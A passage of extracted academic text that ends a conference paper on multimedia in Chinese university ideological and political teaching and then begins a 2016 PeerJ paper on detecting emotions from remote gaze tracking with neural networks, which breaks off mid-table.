teacher in the teaching process only pay attention to control the multimedia to complete the rigid teaching process and neglected the interaction with students. Students often focus on copying the contents of courseware onto their notebooks, and often neglect their teacher's explanation. This is not conducive to the student's thinking in the teaching process, weakening the student's dominant position, resulting in the student's rational thinking can not be good development of. Under such circumstances, multimedia is completely reduced to "instilling knowledge machine to students". It not only plays a positive role in promoting ideological and political teaching, but also hinders the emotional communication between teachers and students, making classroom teaching more dull and boring. IV. EFFECTIVELY USING MULTIMEDIA TO REFORM IDEOLOGICAL AND POLITICAL EDUCATION A. The multimedia courseware should be combined with the content of the textbook As a form of better performance of the content of teaching materials, multimedia courseware must obey the contents of the teaching material and can not be divorced from the textbook. In order to stimulate students' interest and arouse students' curiosity, some teachers cite a lot of video and audio in multimedia courseware, blindly seeking novelty, ignoring the content of textbooks, and losing the humanistic care that should be contained in teaching. Therefore, teachers must constantly explore how to organically combine multimedia courseware and teaching materials. The multimedia technology is applied to the teaching material and the living situation which is closely related to the content of the teaching material and the thinking characteristics of the students. Teachers should use the textbook as the basis, supplemented by the life situation closely related to the content of the teaching materials, and follow the thinking characteristics of the students to use the multimedia technology. Only in this way, the instrumental role of multimedia technology in university ideological and political education can be truly displayed. B. Teachers should make full use of multimedia technology to cultivate modern talents In the modern era of information technology development, teachers should make full use of multimedia technology to improve the quality and efficiency of ideological and political teaching in colleges and universities. The teachers of the ideological and political education curriculum should get rid of the constraints of the profession and actively learn how to use a lot of media technology in the teaching class. Schools should also pay attention to the popularization of multimedia classrooms, make effective use of resources, and train teachers in multimedia operations so that teachers can better use multimedia technology for daily teaching. In addition, teachers should also be practiced to use multimedia technology to teach and reasonably allocate time for use of courseware, so that multimedia can be effectively used without distracting students' attention. C. Teachers should combine multimedia technology with teaching “Classroom is a powerful interactive environment composed of teachers, students, and the environment. It is a systematic form of education and a unique social organization.” No matter how much multimedia technology can play a role in the ideological and political class, we can never ignore the dominant position of teachers and students. After all, multimedia technology is only used as an auxiliary tool to help teaching, which is doomed it can only be a medium to connect teachers, students and teaching materials, rather than the main body of teaching activities. Especially in the teaching of ideological education, for the elaboration of viewpoints in the teaching materials, teachers cannot only use theories to convince people, and often they must also allow students to get the sublimation of their thoughts through emotional communication with students. The interaction and communication between teachers and students is an indispensable requirement for a qualified teaching activity. Teachers' language and body movements, even their eyes, play an indispensable role in multimedia technology. Therefore, we must not regard multimedia as omnipotent, and we must not let multimedia replace the status of teachers in teaching activities. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 125 V. CONCLUSION To sum up, multimedia technology plays an active role in improving teaching activities, which is an important way to improve teaching quality and stimulate students' interest in learning. The application of multimedia technology in teaching has changed the form of traditional teaching, showing the teaching contents in the form of comprehensive multimedia information, deepening the students' understanding of knowledge, and promoting the diversified and comprehensive development of teaching methods. It fully reflects the cooperative relationship between teaching and learning and arouses students' interest in learning. However, as a means of auxiliary teaching, multimedia technology is not a master key, it has its inevitable "double edge", if it is treated reasonably and used effectively, It can greatly improve the quality and efficiency of ideological and political education, on the contrary, it will only hinder the development of ideological and political teaching activities in colleges and universities. Only by studying deeply, reasonably designing, developing and using multimedia technology, and combining it with other teaching methods, can we optimize classroom teaching and embody the real value of multimedia technology assisted teaching. REFERENCES [1] Wang Hongmei and Zhang Jianlong, “Research on The Combination of Multimedia Technology and Traditional Teaching Methods”, Journal of Xinjiang Medical University, 2007(11). [2] Zhang Song, “Research on Construction and Application of Ideological and Political Education Network System Based on Video on Demand in Colleges and Universities”, Shenyang Normal University, 2011. [3] Ma Dandan and Bai Jing, “Design and Implementation of the Comprehensive Information Platform for Smelting Enterprises”, International Journal of Advanced Network Monitoring and Controls. Volume 2, No.4, 2017. [4] Han Dameng and Hu Wanqing, “On the Problems and Countermeasures of Multimedia Teaching in Ideological and Political Courses in Universities”, Professional technology, 2014(01). [5] Zhang Haiyan, “A Survey of the Status Quo of College Multimedia Network Teaching and Strategies of Optimizing Modes”, Journal of Changchun University of Science and Technology, 2011(12). [6] Li Yihu, “Research of Integration Technology between CATIA and TOOLMANAGER Based on CAA”, International Journal of Advanced Network, Monitoring, and Controls. Vol. 1, No. 1, 2016 . [7] Wei Zhang, “Fuel Cell Test System Based on AVR Single-Chip Computer”, International Journal of Advanced Network, Monitoring and Controls. Volume 2, No.4, 2017. [8] Jie Huang, “Research on Balanced Energy Consumption of Wireless Sensor Network Nodes Based on Clustering Algorithm”, International Journal of Advanced Network, Monitoring and Controls. Volume 2, No.4, 2017. [9] Jingwen Chen and Hongshe Dang, “The Design of Two Phase Chopping Regulation Voltage Soft Starter”, International Journal of Advanced Network Monitoring and Controls.Volume 02, No.2, 2017 . http://www.ijanmc.org/201704/iccnea202-1.pdf http://www.ijanmc.org/201704/iccnea202-1.pdf http://www.ijanmc.org/201704/iccnea105-11.pdf http://www.ijanmc.org/201704/iccnea105-11.pdf http://www.ijanmc.org/201704/iccnea220-4.pdf http://www.ijanmc.org/201704/iccnea220-4.pdf work_njxbtq4pdzcqpdgnxubcg3qk54 ---- Submitted 23 February 2016 Accepted 30 June 2016 Published 15 August 2016 Corresponding author Rytis Maskeliunas, rytis.maskeliunas@ktu.lt Academic editor Pinar Duygulu Additional Information and Declarations can be found on page 20 DOI 10.7717/peerj-cs.75 Copyright 2016 Maskeliunas and Raudonis Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Are you ashamed? Can a gaze tracker tell? Rytis Maskeliunas1 and Vidas Raudonis2 1 Department of Multimedia Engineering, Faculty of Informatics, Kaunas University of Technology, Kaunas, Lithuania 2 Department of Automation, Faculty of Electrical and Electronics Engineering, Kaunas University of Technology, Kaunas, Lithuania ABSTRACT Our aim was to determine the possibility of detecting cognitive emotion information (neutral, disgust, shameful, ‘‘sensory pleasure’’) by using a remote eye tracker within an approximate range of 1 meter. Our implementation was based on a self-learning ANN used for profile building, emotion status identification and recognition. Participants of the experiment were provoked with audiovisual stimuli (videos with sounds) to measure the emotional feedback. The proposed system was able to classify each felt emotion with an average of 90% accuracy (2 second measuring interval). Subjects Human-Computer Interaction, Artificial Intelligence, Computer Vision Keywords Cognitive, Recognition, Emotions, Gaze-tracking INTRODUCTION The user interfaces of the future cannot be imagined without an emotion-sensitive modality. More ways other than plain speech are used for communication. Spatial, temporal, visual and vocal cues are often forgotten in computer interfaces. Each cue relates to one or more forms of nonverbal communication that can be divided into chronemics, haptics, kinesics, oculesics, olfactics, paralanguage and proxemics (Tubbs, 2009), relating to certain activities of a human body, voice or gazing. Unfortunately, modern computer-based user interfaces do not take full advantage of nonverbal communicative abilities, often resulting in a much less than natural interaction. Studying classic theories such as (Hess, 1975; Beatty & Lucero- Wagoner, 2000) opens up the idea of eye-tracking for investigating the behavior of the individuals and resulting into the perception of how eye analysis can be used to grasp human behavior from the relationship between pupil responses, various social attitudes and how it might be useful for various other purposes, not excluding diagnostics and therapeutics. Referring to oculesics as a form of nonverbal communication, we can set a goal of detecting transmissions and reception of significant signals between communicators without the use of pronounced words. Researchers working in the field strongly believe that a Human—Computer interaction might be significantly improved by incorporating social and emotional processes (Kappas & Krämer, 2011). It is clear that vital emotional information might affect human behavior in the context of information technology. However, this area is still somewhat new—progress is starting to become noticeable, ranging from enhancing the naturalness of interfaces to treatments (Bal et al., 2010). Naturally, the emotional part will closely correlate to the eye-based HCIs. Emotional information might How to cite this article Maskeliunas and Raudonis (2016), Are you ashamed? Can a gaze tracker tell? PeerJ Comput. Sci. 2:e75; DOI 10.7717/peerj-cs.75 https://peerj.com mailto:rytis.maskeliunas@ktu.lt https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.75 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.75 be used to attract a user’s attention and then create a favorable atmosphere for subsequent interactions and to increase a user’s willingness to engage in an interaction (Bee, André & Tober, 2009). A recording of visual fixation in nearly real-time can enable us to tell whether individuals express visual attention, are bored or disengaged (D’Mello et al., 2012) or are they tired or fatigued (Nguyen, Isaacowitz & Rubin, 2009). The manuscript presents an extension of our work on the development of gaze tracking- based emotion recognition system (Viola & Jones, 2004; Raudonis et al., 2013). In other works we have taken a wearable eye tracking device as the main component of an emotion recognition system. Along with a practical task of tele-marketing we are now investigating if it was possible to recognize emotions using a system based on the remote gaze tracking device. Two additional emotional stimuli such as ‘‘sensory pleasure’’ and ‘‘shame’’ were introduced in the analysis framework. ‘‘Disgust’’ and ‘‘neutral’’ emotions were also measured for comparison purposes. The paper presents background analysis, implementation, and concludes with an experimental evaluation. BACKGROUND ANALYSIS Emotions can be categorized into 15 basic emotion stages, which are amusement, anger, contempt, contentment, disgust, embarrassment, excitement, fear, guilt, pride in achievement, relief, sadness/distress, satisfaction, sensory pleasure, and shame. Each of these fifteen stem out to similar and related sub-emotions (Ekman, 1999). The combination of emotions results in a human feeling (Plutchik, 1999). Investigations have shown that eye contact in human-to-human communications play a significant role, where different types of eye motions can represent different emotions. Even non-communicative persons display emotions (Al-Omar, 2013). Anger is associated with glaring and wide open eyes, boredom involves not focusing or focusing to something else, sadness comes with looking down, etc. (Roche & Roche, 2007). This information can be transferred into gaze models based on emotional expressions (Lance & Marsella, 2008). Gaze is influenced by contextual factors such as the emotional expression, as well as the participant’s goal (Kuhn & Tipples, 2011). Cultural differences are affected by contextual information, though the benefit of contextual information depends upon the perceptual dissimilarity of the contextual emotions to the target emotion and the gaze pattern (Stanley et al., 2013). Novel technological improvements enable the development of affordable, video oculography-based, eye-tracking devices, which were previously available only to a laboratory researcher. These can be divided into two major groups depending on the kind of light used either infrared or visible (Lu, Lu & Yang, 2012). The authors of Christianson et al. (1991) have focused on change dynamics of the pupil (a pupillary response). The study showed that the size of the pupil can change voluntarily or involuntarily. The change in size can result from the appearance of real or perceived objects of focus, and even at the real or guessed indication of such appearances (Calandra et al., 2015). This offers the feasibility of including pupil dilation as a measure to reflect affective states of individuals in the overall emotional intelligence screening system (Al-Omar, Al-Wabil & Fawzi, 2013). The results of Duque, Sanchez & Vazquez (2014) look at gaze-fixation and pupil dilation Maskeliunas and Raudonis (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.75 2/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.75 support the idea that sustained processing of negative information is associated with a higher ruminative style and indicate differential associations between these factors at different levels of depressive symptomatology. The assessment of attentional orienting and engagement into emotional visual scenes showed that visual attention is captured by displaying both unpleasant and pleasant emotional content (Nummenmaa, Hyönä & Calvo, 2016). Urry (2010), in a randomized within-subjects design, used a cognitive reappraisal to increase and to decrease emotion levels in response to unpleasant pictures and registering gaze focus and direction. The experiments by Budimir & Palmovic (2011) suggested putting emotional content into the figure area and using different non complementary pictures to see if there is a difference between different emotional categories. Lanatà, Valenza & Scilingo (2013) and Calvo & Lang (2004) reported a promising result aimed at investigation of the gaze pattern and variation of pupil size to discriminate emotional states, induced by looking at pictures with different arousal content. Experimental evaluation showed good performance, with better score on arousal than valence (Ringeval et al., 2013). In Soleymani et al. (2012), a combination of EEG and gaze tracking over a display of database of emotional videos (Soleymani, Pantic & Pun, 2012) resulted in the best classification result of 68.5% for three labels of valence and 76.4% for three labels of arousal. These results were obtained using a modality fusion strategy and a support vector machine, demonstrating that user-independent emotion recognition algorithm can outperform individual self-reports for arousal assessments and do not underperform for valence assessments. The authors of Murphya & Isaacowitza (2010) investigated a factor of age, suggesting that age-related gaze patterns in emotion recognition may depend on the specific emotion being recognized and may not be general across stimuli sets. IMPLEMENTATION Gaze tracking-based emotion detection method must evaluate an individual motion of the human eye and all changes in its properties carefully representing a certain pathway to a current emotion. Eye motions can be grouped basically into two groups: voluntary and involuntary motions. The eye motion consists of changes in a gaze direction, a change of focus, tracking of an object of interest, etc. These kinds of mostly voluntary controlled motions do not necessarily relate to a current emotional state, but can represent a certain physical status (eg., tired/myopic). In our previous implementations, we have used a head-mounted eye tracking device which captured only a user’s eye. The tracker’s camera was fixed next to a user’s eye and as close as possible thus partly blocking a field of view. This was not a desirable feature, as it created a certain discomfort. We have also noticed that certain participants of our experiments likely did not reveal their true emotion since they found the gaze tracking device unpleasant. The remote eye tracking system does not have such shortcomings and enables capturing ‘‘real’’ (likely) emotions. The authors of the manuscript have decided to investigate two additional emotions which were not investigated in previous works (‘‘shame’’ and ‘‘sensory pleasure’’). The section below depicts our ANN based emotion recognition model along with gaze recognition methods, calibration procedure and system workflow. Maskeliunas and Raudonis (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.75 3/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.75 Figure 1 The ANN model and hardware implementation of experimental investigation. Emotion recognition model Figure 1 illustrates work flow of an ANN-based classification algorithm. It consists of a measurement device that forms an input vector for four independent neural networks. Each neural network is trained for each individual person to recognize a specific emotional status, i.e., neutral, disgust, shameful or ‘‘sensory pleasure.’’ The algorithm executes three main steps it: collects data samples, trains a classifier, and makes a decision based on the response of the classifier. The algorithm uses four different neural networks which independently classify given input signals. Levenberg–Marquardt backpropagation was applied as the learning method, activation function served as sigmoid, there were three layers (input layer, hidden layer and output layer). There are 80 neurons onto the first input layer, three neurons on the second hidden layer and one neuron for output. Three features were considered for the ANN networks: the size of the eye pupil d, the position of the gaze point (coordinates x, y) and the motion speed of the gazing point v. The gaze point is the intersection point of gaze vector and the ‘‘surface’’ of the computer screen. Each feature was sampled from 1 to 20 samples per second; therefore, the number of ANN inputs varied. A sample is one measurement taken from one video frame (F). If there is a need for 20 samples, 20 video frames will be measured. One sample includes four parameters: a diameter of the eye pupil (d), a location coordinates of the eye pupil (x, y) and a motion speed on the eye pupil (v), which are taken as a difference between F(t−1)−F(t). Values of d, x, y and v are used as inputs for neural network. Such combination of values corresponds to one measurement taken from one frame. If we use two measurements (two frames) then a number of inputs will be equal to 4 but not 8 (d1, Maskeliunas and Raudonis (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.75 4/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.75 x1, y1, v_1, d2, x2, y2, d2). An optimal number of inputs was 80 as it corresponded to one second measurement. Pseudo code of an emotion classification algorithm is presented below. ANN-based emotion classification algorithm 1. Collecting sample data: X =([dt ...dt+m][xt ...xt+m][yt ...yt+m][vt ...vt+m−1]) 2. Train ANN classifiers based on input data yj = f (∑m i=1Xiωji ) , where j=1,2,3,4 3. Make real-time emotion classification [maxValue ID]=max (y1,y2,y3,y4); If maxValue > Threshold Emotion= ID; end Here t—is the time moment at which a sample was recorded, X—the input vector of the ANN, y—output or membership probability, ω–weights of a neural network, d—the diameter of the recognized pupil, xt and yt are the coordinates of the pupil center and vt is the speed of motion of the eye pupils. The final decision is based on a maximal value of membership probability. The recognized emotional state is equal to a network ID that had the highest probability value. We have used a threshold value of 0,5. Measurements of eye pupil’s center were used for probable capturing of attention focus to a certain extent, as this parameter strongly correlated to the given visual stimuli. ANN finds probable relations to a certain emotion from a coordinate sequence (i.e., several measurements of the pupil’s center). Gaze tracking methods The detection and tracking of the human eye was executed in the images acquired in the IR light. The eye illuminated with IR light can give two outcomes: the image of a dark or a bright eye pupil (pupil image and corneal reflection image). The image of a bright pupil is taken when the optical axis of a camera is parallel to the flow of IR light. The image of a dark pupil is taken when optical axis is not parallel to the flow of IR light. Such images are captured in the near IR, which always shows a dark pupil area resulting from the absorption of IR in the inner eye tissues. The dark pupil effect is used in our eye pupil tracking system. Such an effect simplifies eye pupil detection and the tracking task to a more reliable detection of the dark and rounded region in the image. An initial size of the eye pupil in the image is not known at the starting moment, because the eye pupil has relatively high size variation range. The size variation limits are well known (Iskander et al., 2004) and this a priori information is incorporated in the eye pupil detection algorithm. Presented algorithm uses a notation Rmin and Rmax for describing the lower and upper limits of the eye pupil (or radius). In this paper we have used a commercial remote eye tracking system hardware (Eye Tribe, Copenhagen, Denmark; https://theeyetribe.com/products/) which is based on one Maskeliunas and Raudonis (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.75 5/22 https://peerj.com https://theeyetribe.com/products/ http://dx.doi.org/10.7717/peerj-cs.75 camera sensor and two IR light sources. Acquired images were processed using our own software. The process was based on three fundamental steps: 1 detection of an accurate pupil position; 2 detection of a corneal reflection; 3 finding the relationship between a gaze point and a displacement of the eye pupil position. The accurate eye pupil and Purkinje reflection is detected by evaluating statistical values of the grey scaled image, i.e., average values of greyness µ and standard deviation σ grey color in the region of interest. These statistical values are computed on the basis of formulas (2) and (3). The accurate detection of an intersection point between the surface of the screen and the gaze vector strongly relies on the calibration procedure and conditions. The calibration ensures a relation between the gaze point (X, Y coordinates on a computer screen) and a pupil position in a captured frame. The grey scaled image G(u,v) is computations are based on formula (1). The pixel value of the grey scaled image is acquired by computing an average color of the three color channels. G(u,v)= 1 3 3∑ k=1 0k(u,v) (1) Here 0k(u,v) is a color image of the three color channels k=1,2,3. The notations u and v describe coordinates of the image pixel in the matrix. The average greyness value of region of interest (ROI) can be computed via (2). µ= ∑U u=1 ∑V v=1G(u,v) U ·V . (2) The standard deviation of the greyness of ROI is computed using formula (3). σ = √∑U u=1 ∑V v=1(G(u,v)−µ) 2 U ·V −1 . (3) Here U and V relate to a total number of rows and columns in the image. Calculated statistical parameters are further used for position detection of the eye pupil and a corneal reflection. The dark pupil region is detected by estimating a mean greyness value and the standard deviation of each new eye image taken by a remote gaze tracker. Each pixel of an eye image is labeled on the basis of estimated statistics of a functional condition given in formulas (6) and (7). The resulting image Mp that maps the location of a dark region of the eye pupil is estimated regarding condition (6). The black and white image Mr that maps the location of reflection point is estimated using a condition (7). Mp(u,v)= { 1, if G(u,v)< µ−2σ 0, otherwise (4) Mr(u,v)= { 1, if G(u,v)>µ+3σ 0, otherwise. (5) Maskeliunas and Raudonis (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.75 6/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.75 Figure 2 Grayscaled image G(u,v), and resulting mapping of the Mp and Mr. Examples of the resulting mapping (eye pupil and three reflection points) are shown in Fig. 2. The eye pupil is detected in a mapping image Mp. Each resulting point cloud in Mp is measured. The geometrical properties such as geometrical center and area of the cloud (region) are evaluated. The resulting regions in Mp often form simple polygons made of flat shapes consisting of straight, non-intersecting line segments which are joined pairwise to form a closed path. Therefore, formula (6) can be applied to estimate the area of such region. A(j)= 1 2 N−1∑ i=0 (xj(i)yj(i+1)−xj(i+1)yj(i)). (6) Here x(i) and y(i) are vertices of a simple polygon. The coordinates of the geometrical center C (described as C =(Cx,Cy)) of the polygons, can be defined as: Cx(j)= 1 6A J−1∑ i=0 ( xj(i)+xj(i+1) ) (xj(i)yj(i+1)−xj(i+1)yj(i)) (7) Cy(j)= 1 6A J−1∑ i=0 ( yj(i)+yj(i+1) ) (xj(i)yj(i+1)−xj(i+1)yj(i)). (8) Maskeliunas and Raudonis (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.75 7/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.75 Figure 3 The eye iris and measurements to calculate a gaze point. Here a total number of polygons j is defined as 0< j < J−1. In (7), (8) and (9) vertices are numbered in a sequence, from the vertex x(0), y(0) to x(N), y(N). The jth region is labeled as the region that belongs to the eye pupil if it satisfies the condition (9). xc,yc =Cx ( j ) ,Cy ( j ) if Amin≤A≤Amax. (9) Here Amin=πR2min is a minimal limit of the eye pupil size and Amax=πR 2 max is a maximum limit of the pupil size. Notations xc and yc denote center coordinates of the detected eye pupil. When the pupil’s center is detected, the first closest reflection point is searched for in the mapping image Mr. There are k points in Mr, and the distance to each point can be expressed as: Dr(k)= √ (xc−u)2+(yc−v)2, if MR(u,v)=1. (10) Coordinates of the corneal reflection xr and yr are estimated by finding a minimal distance Dr using an expression (13). (xr,yr)=min k (Dr(k)). (11) The resulting gaze point is obtained by interpolating locations of the pupil’s center and the first corneal reflection. The Fig. 3 illustrates measurements aimed to interpolate the Maskeliunas and Raudonis (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.75 8/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.75 actual intersection point between the gaze vector and the surface of the screen. Displacement values are used for the calibration process. The displacements along horizontal axis and vertical axis can be calculated as: 4x =xc−xr, 4y =yc−yr. (12) The linear approximation to a gaze point can be expressed as: X =a11+a12dx, Y =a21+a22dy. (13) Here X and Y are coordinates of a cursor on a computer screen. Using the method of the least squares a coeficient is calculated by minimazing an error function E(a). Ex(a)=X−(a11+a12dx), Ey(a)=Y −(a21+a22dy). (14) The speed is defined as a simple sum of differences (15). Positive and negative values show the direction in which the gaze is moving. Therefore, a negative value of speed represents only a direction of gazing and how rapidly it changes. v =(xt −xt−1)+(yt −yt−1). (15) The algorithm has an additional feature to capture out-of-bounds event, in which the extreme turn of the user’s head must be detected to signal the main recognition system to opt-out an event where a user has turned his head away from the computer screen (to capture a ‘‘look over the shoulder’’ effect). Such head motions were often noticeable when participants were stimulated by ‘‘shame’’ and ‘‘disgust’’ emotional stimuli. We have implemented this using standard HAAR cascades to detect a face (Viola & Jones, 2004). When two eyes were visible, a system counted that a user was in the range of tracking fields, otherwise an out of bound event was generated. Calibration The calibration method is a set of processes that establish a relationship between the center gaze point and an actual position of the computer screen. For the experiment, a 24’’ 1080p monitor has been used. The participants had to watch a calibration grid which consisted of 9 points. Each calibration point was shown once at a time in a serial manner (Fig. 4A). The calibration process was executed each time, when a user accessed a gaze tracking system. Such recalibration procedure ensured reasonably good quality of the measurements. The resulting distribution of the gaze points is illustrated in Fig. 4B. The mean absolute gaze estimation error on the vertical axis was about 45 pixels and about 23 pixels on the horizontal axis. In the event of the extreme head pose change and recover, the mean absolute gaze estimation error on the vertical axis was about 83 pixels and about 41 pixels on the horizontal axis. An approximate optimum quality eye-to-camera distance was established to be at around 1 meter. This was measured by authors themselves (as expert users) testing the device with an increasing range from 50 cm to 2 m with a step of 10 cm. Maskeliunas and Raudonis (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.75 9/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.75 Figure 4 A screen with a calibration grid (A) and the calibration result shown by the distribution of pixels around a calibration point (B). System workflow System workflow is illustrated in the flow chart shown in Fig. 5. Each participant was asked to calibrate the eye tracking system, based on a certain procedure. The chair was ‘‘fixed,’’ so the torso was not moving and the head position (gaze-point) on a turn back event remained stable. The orientation of the head was evaluated on the basis of the detected eye positions. The orientation angle was estimated between a horizontal line and a line drawn between the detected eye centers. Such an angle informs about how much a head is rotated around Y axis (inclined). All other rotation angles were controlled by not allowing additional movement (per instruction). EXPERIMENTAL INVESTIGATION Experimental setup Experiments were carried out during a day time, therefore a test room was illuminated mostly by a sun light only (amount and position changing over time) and, depending on the time of day, blinds were used on windows. Illumination levels were also impacted by door opening/closing (corridor is always brightly lit) during the early morning (∼8:00)/noon (∼17:00). The eye itself was illuminated using an infrared light source of eye tracker’s hardware. A difference vector between a pupil center and a glint point remained stable in most conditions. All data sets of a perceived session were reviewed manually. Data where our algorithm was unable to correct itself (missed an out of bounds event) was removed aiming not to impact results. A total of 30 volunteers (20 males, 10 females, 24–42 years old) were asked to participate in testing the system of emotion recognition. We have chosen a similar set of participants Maskeliunas and Raudonis (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.75 10/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.75 Figure 5 System workflow diagram. as in our previous experiments (Raudonis et al., 2013; Raudonis, 2012). Unfortunately, a majority of people involved were not the same as two years have passed and we have had no opportunity to replicate that factor. To induce more reliable responses in participants, all experiments were conducted in an open-door environment (somebody often comes in) instead of a closed door laboratory type room as in our previous studies. An accidental visitor could observe a participant and experimental environment thus increasing the effect of stimuli, especially when content provoking shame and disgust emotions was demonstrated. Video materials (800*600) consisting of neutral, disgusting, shameful and ‘‘sensory pleasure’’ content (sample screenshots in Fig. 6) were played back in a close view on 24’’ 1080p monitor in full screen and with sound. All videos were gathered from the public domain with a help of psychologist. The database consists of five different clips (length 12 min each, 1 h total) for every emotion (total length of 4 h). Two out of those clips were used for training (24 min per emotion), other three (36 min per emotion) for Maskeliunas and Raudonis (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.75 11/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.75 Figure 6 Visual stimulus samples which were used for experimental investigation and should invoke four different emotional states: (A) neutral, (B) disgust, (C) shame and (D) sensory pleasure. evaluation. A randomly selected 2-minute fragment was displayed during training and evaluation stages, five times (two times during training, three times during evaluation) for each person per emotion (in total each person viewed 10 min of content (combined) per emotion). Videos used for training were not played during the evaluation. Each participant was given a 5-minute break between playback of different emotions. We have asked each participant to subjectively verify a perceived emotion and we have only used only ‘‘confirmed’’ signals. During a stimulation process the size of the pupil, the coordinates of the pupil center and a gaze point movement speed were registered. Research on human subjects was approved by an Institutional Review Board of Kaunas University of Technology (document # 1409-16-04). Experimental results Figure 7A illustrates a sample fragment of measurements of the size of 6 people pupil. The size of each participant’s eye pupil was different during the perception process of each emotion, for example, the size of the first person’s pupil was ∼17 % larger when being in a neutral state vs being involved in a content (0.075 pixels vs 0.062 pixels). Deviation data have shown that it is important to note that the size can change significantly over time while likely still experiencing a similar emotion. This example proves that we cannot universally and subject-independently determine the real emotion a human was experiencing referring only to his eye pupil’s size. All remaining classification features have to be included. Maskeliunas and Raudonis (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.75 12/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.75 Figure 7 Average pupil size of first six participants who were stimulated with four different emotional stimuli (A) and average pupil size between participants of the experiment (B). Figure 7B illustrates an average pupil size for all of the participants (average of 30 people) who were stimulated with certain emotional stimuli. Red and blue lines mark variation limits of the pupil size. A pupil size shows that the highest emotional extremes were obtained when a person was stimulated by ‘‘sensory pleasure’’ and ‘‘shame’’ emotional stimuli. Figure 8 illustrates attention concentration maps, representing attention map of the person stimulated with each specific emotion separately. The radius of each grey circle correlates with time spent to observe a specific part of the visual data and certain coordinates of the attention point. This is illustrated by the attention concentration map for one person on the left and the average attention map for all participants on the right. A blue line in the attention map represents a trajectory of the gaze point. Attention maps highlight different regions of two dimensional visual stimuli. Such distribution of attention points strongly depends on the felt emotion at a given moment. Attention maps are drawn with regard to presented visual data, arrangement of details in visual stimuli and cognitive capabilities of the individual person. Certain ‘‘parts’’ of the disgust emotional stimuli were ignored by all participants. A point of interest moves quite differently in a 2D space during each of the emotional stimuli. The next obvious conclusion was that this data might be usable to determine a current emotion. A movement parameter also depended on the context of emotional information shown on screen, as well as a position and motion of the object on screen (especially during videos where a view was concentrated on the specific subject). For example, all participants tried not to concentrate on the disgusting ‘‘bits’’ in videos, so an average trajectory covered a reasonably small path in 2D space. A large overlap of 2D space was noted when ‘‘sensory pleasure’’ videos for most of participants were played, Maskeliunas and Raudonis (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.75 13/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.75 Figure 8 Attention map of ID1 participant (A, C, E, G) and average attention mapgaze trajectory (B, D, F, H) of all participants stimulated by the neutral (A and B), disgust (C and D), shameful (E and F) and ‘‘sensory pleasure’’ (G and H) emotional stimuli. Maskeliunas and Raudonis (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.75 14/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.75 Table 1 Average jump distance between gaze fixation points. Emotion stimuli Average jump distance (mean ± std), [pixels] ‘‘Neutral’’ 14.45±20.7 ‘‘Disgust’’ 6.9±4.9 ‘‘Shame’’ 36.7±40.3 ‘‘Sensory pleasure’’ 23±31.53 as most viewed this content in a quite relaxed manner and did not concentrate much. When other types of materials were demonstrated, a movement was somewhat more concentrated. Playback of ‘‘shameful’’ (erotic movies) and to some extend ‘‘disgusting’’ content introduced a quick look ‘‘over the shoulder’’ effect (checking if someone was there to identify who is the public ‘‘sinner’’—an effect which might very well be region and culture dependent). Smaller attention maps and longer trajectories were generated due to this effect (Figs. 8E–8F). To evaluate a magnitude of changes in the trajectory of a gaze point, histograms and outcomes of a probability distance function (PDF) of distances between gaze fixation points and the speed of changing fixation points were given (Fig. 9). Data were calculated from the gaze trajectories acquired when participants were stimulated using (A) neutral, (B) disgust, (C) shameful and (D) ‘‘sensory pleasure’’ emotional stimuli. Pixel values were as calculated and were not rounded. PDFs were calculated using a standard MATLAB implementation (16). y = f (x|µ,σ)= 1 σ √ 2π e −(x−µ)2 2σ2 . (16) The first parameter µ is the mean. The second σ is the standard deviation. The average distance between gaze fixations points is given in Table 1. The smallest distance between gaze fixation points was estimated from a gaze trajectory when a person was stimulated with a disgust emotional stimulus. The highest jump in distance was generated when person was stimulated with a shameful emotional stimulus (part of a psychological effect of a person not wanting to be identified). To evaluate the changes of speed in the trajectory of a gaze point, histograms and probability density functions of the gaze point change scale (speed of gazing) are shown in Fig. 10, representing a distribution of an average speed. The speed was evaluated with a pixel per frame value which showed how fast the gaze moved from frame to frame. Data were calculated from gaze trajectories when participants were stimulated using (a) neutral, (b) disgust, (c) shameful and (d) ‘‘sensory pleasure’’ emotional stimuli. Values of average changes of speed in the gaze trajectory are given in Table 2. Positive and negative values show a direction in which the gaze is moving. Therefore, a negative value of speed represents only a direction of gazing and how rapidly it changes. An average speed given varies around 0. This means that the gaze direction is rapidly changing around 0 (mu =0); therefore, the std value is more important here because it represents the distribution of speed. The speed is computed as location difference between frames F(t−1)−F(t). The speed is defined as a simple sum of differences (see (16)). Positive and negative values show Maskeliunas and Raudonis (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.75 15/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.75 Figure 9 Average histogram and probability density function (top left corner) of distances between gaze fixation points when a person was stimulated with (A) neutral, (B) disgust, (C) shameful and (D) ‘‘sensory pleasure’’ emotional stimuli. Table 2 Average changes of 